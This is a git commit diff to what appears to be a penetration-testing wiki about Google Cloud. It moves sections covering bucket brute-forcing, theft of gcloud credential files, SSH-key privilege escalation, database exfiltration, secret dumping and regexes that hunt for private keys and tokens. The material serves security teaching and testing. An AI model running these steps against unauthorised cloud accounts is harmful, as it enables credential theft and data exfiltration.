GitBook: [#2802] gcp up

This commit is contained in:
CPol 2021-10-25 14:05:48 +00:00 committed by gitbook-bot
parent 8d35569d90
commit 13ec8f13cb
No known key found for this signature in database
GPG Key ID: 07D2180C7B12D0FF
7 changed files with 210 additions and 113 deletions

View File

@ -507,6 +507,7 @@
* [GCP - Compute Enumeration](cloud-security/gcp-security/gcp-compute-enumeration.md)
* [GCP - Network Enumeration](cloud-security/gcp-security/gcp-network-enumeration.md)
* [GCP - KMS & Secrets Management Enumeration](cloud-security/gcp-security/gcp-kms-and-secrets-management-enumeration.md)
* [GCP - Databases](cloud-security/gcp-security/gcp-databases.md)
## Physical attacks

View File

@ -1,6 +1,4 @@
# GCP - Buckets: Brute-Force, Privilege Escalation & Enumeration
## Brute-Force
# GCP - Buckets Brute-Force & Privilege Escalation
As other clouds, GCP also offers Buckets to its users. These buckets might be (to list the content, read, write...).
@ -31,37 +29,6 @@ gsutil iam ch group:allAuthenticatedUsers:admin gs://BUCKET_NAME
One of the main attractions to escalating from a LegacyBucketOwner to Storage Admin is the ability to use the “storage.buckets.delete” privilege. In theory, you could **delete the bucket after escalating your privileges, then you could create the bucket in your own account to steal the name**.
## Authenticated Enumeration
Default configurations permit read access to storage. This means that you may **enumerate ALL storage buckets in the project**, including **listing** and **accessing** the contents inside.
This can be a MAJOR vector for privilege escalation, as those buckets can contain secrets.
The following commands will help you explore this vector:
```bash
# List all storage buckets in project
gsutil ls
# Get detailed info on all buckets in project
gsutil ls -L
# List contents of a specific bucket (recursive, so careful!)
gsutil ls -r gs://bucket-name/
# Cat the context of a file without copying it locally
gsutil cat gs://bucket-name/folder/object
# Copy an object from the bucket to your local storage for review
gsutil cp gs://bucket-name/folder/object ~/
```
If you get a permission denied error listing buckets you may still have access to the content. So, now that you know about the name convention of the buckets you can generate a list of possible names and try to access them:
```bash
for i in $(cat wordlist.txt); do gsutil ls -r gs://"$i"; done
```
## References
* [https://rhinosecuritylabs.com/gcp/google-cloud-platform-gcp-bucket-enumeration/](https://rhinosecuritylabs.com/gcp/google-cloud-platform-gcp-bucket-enumeration/)

View File

@ -1,4 +1,4 @@
# GCP - Compute Enumeration
# GCP - Compute & Network Enumeration
## Compute instances
@ -72,13 +72,24 @@ You can then [export](https://cloud.google.com/sdk/gcloud/reference/compute/imag
$ gcloud compute images list --no-standard-images
```
### Local Privilege Escalation and Pivoting
### **Steal gcloud authorizations**
If you compromises a compute instance you should also check the actions mentioned in this page:
It's quite possible that** other users on the same box have been running `gcloud`** commands using an account more powerful than your own. You'll **need local root** to do this.
{% content-ref url="gcp-local-privilege-escalation-ssh-pivoting.md" %}
[gcp-local-privilege-escalation-ssh-pivoting.md](gcp-local-privilege-escalation-ssh-pivoting.md)
{% endcontent-ref %}
First, find what `gcloud` config directories exist in users' home folders.
```
$ sudo find / -name "gcloud"
```
You can manually inspect the files inside, but these are generally the ones with the secrets:
* \~/.config/gcloud/credentials.db
* \~/.config/gcloud/legacy\_credentials/\[ACCOUNT]/adc.json
* \~/.config/gcloud/legacy\_credentials/\[ACCOUNT]/.boto
* \~/.credentials.json
Now, you have the option of looking for clear text credentials in these files or simply copying the entire `gcloud` folder to a machine you control and running `gcloud auth list` to see what accounts are now available to you.
## Images

View File

@ -0,0 +1,59 @@
# GCP - Databases
Google has [a handful of database technologies](https://cloud.google.com/products/databases/) that you may have access to via the default service account or another set of credentials you have compromised thus far.
Databases will usually contain interesting information, so it would be completely recommended to check them. Each database type provides various **`gcloud` commands to export the data**. This typically involves **writing the database to a cloud storage bucket first**, which you can then download. It may be best to use an existing bucket you already have access to, but you can also create your own if you want.
As an example, you can follow [Google's documentation](https://cloud.google.com/sql/docs/mysql/import-export/exporting) to exfiltrate a Cloud SQL database.
### [Cloud SQL](https://cloud.google.com/sdk/gcloud/reference/sql/)
Cloud SQL instances are **fully managed, relational MySQL, PostgreSQL and SQL Server databases**. Google handles replication, patch management and database management to ensure availability and performance.[Learn more](https://cloud.google.com/sql/docs/)
```bash
# Cloud SQL
gcloud sql instances list
gcloud sql databases list --instance [INSTANCE]
gcloud sql backups list --instance [INSTANCE]
```
### [Cloud Spanner](https://cloud.google.com/sdk/gcloud/reference/spanner/)
Fully managed relational database with unlimited scale, strong consistency, and up to 99.999% availability.
```bash
# Cloud Spanner
gcloud spanner instances list
gcloud spanner databases list --instance [INSTANCE]
gcloud spanner backups list --instance [INSTANCE]
```
### [Cloud Bigtable](https://cloud.google.com/sdk/gcloud/reference/bigtable/) <a href="cloud-bigtable" id="cloud-bigtable"></a>
A fully managed, scalable NoSQL database service for large analytical and operational workloads with up to 99.999% availability. [Learn more](https://cloud.google.com/bigtable).
```bash
# Cloud Bigtable
gcloud bigtable instances list
gcloud bigtable clusters list
gcloud bigtable backups list --instance [INSTANCE]
```
### [Cloud Firestore](https://cloud.google.com/sdk/gcloud/reference/firestore/)
Cloud Firestore is a flexible, scalable database for mobile, web, and server development from Firebase and Google Cloud. Like Firebase Realtime Database, it keeps your data in sync across client apps through realtime listeners and offers offline support for mobile and web so you can build responsive apps that work regardless of network latency or Internet connectivity. Cloud Firestore also offers seamless integration with other Firebase and Google Cloud products, including Cloud Functions. [Learn more](https://firebase.google.com/docs/firestore).
```
```
\
&#x20;
### &#x20;
* [Cloud Firestore](https://cloud.google.com/sdk/gcloud/reference/firestore/)
* [Firebase](https://cloud.google.com/sdk/gcloud/reference/firebase/)
* There are more databases

View File

@ -29,7 +29,7 @@ When using a custom service account, **one** of the following IAM permissions **
* `compute.instances.setMetadata` (to affect a single instance)
* `compute.projects.setCommonInstanceMetadata` (to affect all instances in the project)
Although Google [recommends](https://cloud.google.com/compute/docs/access/service-accounts#associating\_a\_service\_account\_to\_an\_instance) not using access scopes for custom service accounts, it is still possible to do so. You'll need one of the following **access scopes**:
Although Google [recommends](https://cloud.google.com/compute/docs/access/service-accounts#associating_a_service_account_to_an_instance) not using access scopes for custom service accounts, it is still possible to do so. You'll need one of the following **access scopes**:
* `https://www.googleapis.com/auth/compute`
* `https://www.googleapis.com/auth/cloud-platfo`rm
@ -46,7 +46,7 @@ So, if you can **modify custom instance metadata** with your service account, yo
### **Add SSH key to existing privileged user**
Let's start by adding our own key to an existing account, as that will probably make the least noise.&#x20;
Let's start by adding our own key to an existing account, as that will probably make the least noise.
**Check the instance for existing SSH keys**. Pick one of these users as they are likely to have sudo rights.
@ -139,7 +139,7 @@ This will **generate a new SSH key, add it to your existing user, and add your e
[OS Login](https://cloud.google.com/compute/docs/oslogin/) is an alternative to managing SSH keys. It links a** Google user or service account to a Linux identity**, relying on IAM permissions to grant or deny access to Compute Instances.
OS Login is [enabled](https://cloud.google.com/compute/docs/instances/managing-instance-access#enable\_oslogin) at the project or instance level using the metadata key of `enable-oslogin = TRUE`.
OS Login is [enabled](https://cloud.google.com/compute/docs/instances/managing-instance-access#enable_oslogin) at the project or instance level using the metadata key of `enable-oslogin = TRUE`.
OS Login with two-factor authentication is [enabled](https://cloud.google.com/compute/docs/oslogin/setup-two-factor-authentication) in the same manner with the metadata key of `enable-oslogin-2fa = TRUE`.
@ -150,7 +150,7 @@ The following two **IAM permissions control SSH access to instances with OS Logi
Unlike managing only with SSH keys, these permissions allow the administrator to control whether or not `sudo` is granted.
If your service account has these permissions.** You can simply run the `gcloud compute ssh [INSTANCE]`** command to [connect manually as the service account](https://cloud.google.com/compute/docs/instances/connecting-advanced#sa\_ssh\_manual). **Two-factor **is **only** enforced when using **user accounts**, so that should not slow you down even if it is assigned as shown above.
If your service account has these permissions.** You can simply run the `gcloud compute ssh [INSTANCE]`** command to [connect manually as the service account](https://cloud.google.com/compute/docs/instances/connecting-advanced#sa_ssh_manual). **Two-factor **is **only** enforced when using **user accounts**, so that should not slow you down even if it is assigned as shown above.
Similar to using SSH keys from metadata, you can use this strategy to **escalate privileges locally and/or to access other Compute Instances** on the network.
@ -165,56 +165,3 @@ gcloud compute project-info add-metadata --metadata-from-file ssh-keys=meta.txt
```
If you're really bold, you can also just type `gcloud compute ssh [INSTANCE]` to use your current username on other boxes.
## Search for Keys in the filesystem
It's quite possible that** other users on the same box have been running `gcloud`** commands using an account more powerful than your own. You'll **need local root** to do this.
First, find what `gcloud` config directories exist in users' home folders.
```
sudo find / -name "gcloud"
```
You can manually inspect the files inside, but these are generally the ones with the secrets:
* \~/.config/gcloud/credentials.db
* \~/.config/gcloud/legacy\_credentials/\[ACCOUNT]/adc.json
* \~/.config/gcloud/legacy\_credentials/\[ACCOUNT]/.boto
* \~/.credentials.json
Now, you have the option of looking for clear text credentials in these files or simply copying the entire `gcloud` folder to a machine you control and running `gcloud auth list` to see what accounts are now available to you.
### More API Keys regexes
```bash
TARGET_DIR="/path/to/whatever"
# Service account keys
grep -Pzr "(?s){[^{}]*?service_account[^{}]*?private_key.*?}" \
"$TARGET_DIR"
# Legacy GCP creds
grep -Pzr "(?s){[^{}]*?client_id[^{}]*?client_secret.*?}" \
"$TARGET_DIR"
# Google API keys
grep -Pr "AIza[a-zA-Z0-9\\-_]{35}" \
"$TARGET_DIR"
# Google OAuth tokens
grep -Pr "ya29\.[a-zA-Z0-9_-]{100,200}" \
"$TARGET_DIR"
# Generic SSH keys
grep -Pzr "(?s)-----BEGIN[ A-Z]*?PRIVATE KEY[a-zA-Z0-9/\+=\n-]*?END[ A-Z]*?PRIVATE KEY-----" \
"$TARGET_DIR"
# Signed storage URLs
grep -Pir "storage.googleapis.com.*?Goog-Signature=[a-f0-9]+" \
"$TARGET_DIR"
# Signed policy documents in HTML
grep -Pzr '(?s)<form action.*?googleapis.com.*?name="signature" value=".*?">' \
"$TARGET_DIR"
```

View File

@ -1,5 +1,85 @@
# GCP - Looting
## Databases <a href="accessing-databases" id="accessing-databases"></a>
Google has [a handful of database technologies](https://cloud.google.com/products/databases/) that you may have access to via the default service account or another set of credentials you have compromised thus far.
Databases will usually contain interesting information, so it would be completely recommended to check them. Each database type provides various **`gcloud` commands to export the data**. This typically involves **writing the database to a cloud storage bucket first**, which you can then download. It may be best to use an existing bucket you already have access to, but you can also create your own if you want.
As an example, you can follow [Google's documentation](https://cloud.google.com/sql/docs/mysql/import-export/exporting) to exfiltrate a Cloud SQL database.
* [Cloud SQL](https://cloud.google.com/sdk/gcloud/reference/sql/)
* [Cloud Spanner](https://cloud.google.com/sdk/gcloud/reference/spanner/)
* [Cloud Bigtable](https://cloud.google.com/sdk/gcloud/reference/bigtable/)
* [Cloud Firestore](https://cloud.google.com/sdk/gcloud/reference/firestore/)
* [Firebase](https://cloud.google.com/sdk/gcloud/reference/firebase/)
* There are more databases
```bash
# Cloud SQL
$ gcloud sql instances list
$ gcloud sql databases list --instance [INSTANCE]
# Cloud Spanner
$ gcloud spanner instances list
$ gcloud spanner databases list --instance [INSTANCE]
# Cloud Bigtable
$ gcloud bigtable instances list
```
## Storage Buckets
Default configurations permit read access to storage. This means that you may **enumerate ALL storage buckets in the project**, including **listing** and **accessing** the contents inside.
This can be a MAJOR vector for privilege escalation, as those buckets can contain secrets.
The following commands will help you explore this vector:
```bash
# List all storage buckets in project
gsutil ls
# Get detailed info on all buckets in project
gsutil ls -L
# List contents of a specific bucket (recursive, so careful!)
gsutil ls -r gs://bucket-name/
# Cat the context of a file without copying it locally
gsutil cat gs://bucket-name/folder/object
# Copy an object from the bucket to your local storage for review
gsutil cp gs://bucket-name/folder/object ~/
```
If you get a permission denied error listing buckets you may still have access to the content. So, now that you know about the name convention of the buckets you can generate a list of possible names and try to access them:
```bash
for i in $(cat wordlist.txt); do gsutil ls -r gs://"$i"; done
```
## Crypto Keys
[Cloud Key Management Service](https://cloud.google.com/kms/docs/) is a repository for storing cryptographic keys, such as those used to **encrypt and decrypt sensitive files**. Individual keys are stored in key rings, and granular permissions can be applied at either level.
Having **permissions to list the keys** this is how you can access them:
```bash
# List the global keyrings available
gcloud kms keyrings list --location global
# List the keys inside a keyring
gcloud kms keys list --keyring [KEYRING NAME] --location global
# Decrypt a file using one of your keys
gcloud kms decrypt --ciphertext-file=[INFILE] \
--plaintext-file=[OUTFILE] \
--key [KEY] \
--keyring [KEYRING] \
--location global
```
## Custom Metadata
Administrators can add [custom metadata](https://cloud.google.com/compute/docs/storing-retrieving-metadata#custom) at the instance and project level. This is simply a way to pass **arbitrary key/value pairs into an instance**, and is commonly used for environment variables and startup/shutdown scripts.
@ -169,6 +249,54 @@ kubectl cluster-info
You can read more about `gcloud` for containers [here](https://cloud.google.com/sdk/gcloud/reference/container/).
## Secrets Management
Google [Secrets Management](https://cloud.google.com/solutions/secrets-management/) is a vault-like solution for storing passwords, API keys, certificates, and other sensitive data. As of this writing, it is currently in beta.
```bash
# First, list the entries
gcloud beta secrets list
# Then, pull the clear-text of any secret
gcloud beta secrets versions access 1 --secret="[SECRET NAME]"
```
Note that changing a secret entry will create a new version, so it's worth changing the `1` in the command above to a `2` and so on.
## Search Local Secrets
```
TARGET_DIR="/path/to/whatever"
# Service account keys
grep -Pzr "(?s){[^{}]*?service_account[^{}]*?private_key.*?}" \
"$TARGET_DIR"
# Legacy GCP creds
grep -Pzr "(?s){[^{}]*?client_id[^{}]*?client_secret.*?}" \
"$TARGET_DIR"
# Google API keys
grep -Pr "AIza[a-zA-Z0-9\\-_]{35}" \
"$TARGET_DIR"
# Google OAuth tokens
grep -Pr "ya29\.[a-zA-Z0-9_-]{100,200}" \
"$TARGET_DIR"
# Generic SSH keys
grep -Pzr "(?s)-----BEGIN[ A-Z]*?PRIVATE KEY[a-zA-Z0-9/\+=\n-]*?END[ A-Z]*?PRIVATE KEY-----" \
"$TARGET_DIR"
# Signed storage URLs
grep -Pir "storage.googleapis.com.*?Goog-Signature=[a-f0-9]+" \
"$TARGET_DIR"
# Signed policy documents in HTML
grep -Pzr '(?s)<form action.*?googleapis.com.*?name="signature" value=".*?">' \
"$TARGET_DIR"
```
## References
* [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/#reviewing-stackdriver-logging](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/#reviewing-stackdriver-logging)

View File

@ -1,19 +1,3 @@
# GCP - Network Enumeration
## Network Enumeration
### Compute
```bash
# List networks
gcloud compute networks list
gcloud compute networks describe <network>
# List subnetworks
gcloud compute networks subnets list
gcloud compute networks subnets get-iam-policy <name> --region <region>
gcloud compute networks subnets describe <name> --region <region>
# List FW rules in networks
gcloud compute firewall-rules list
```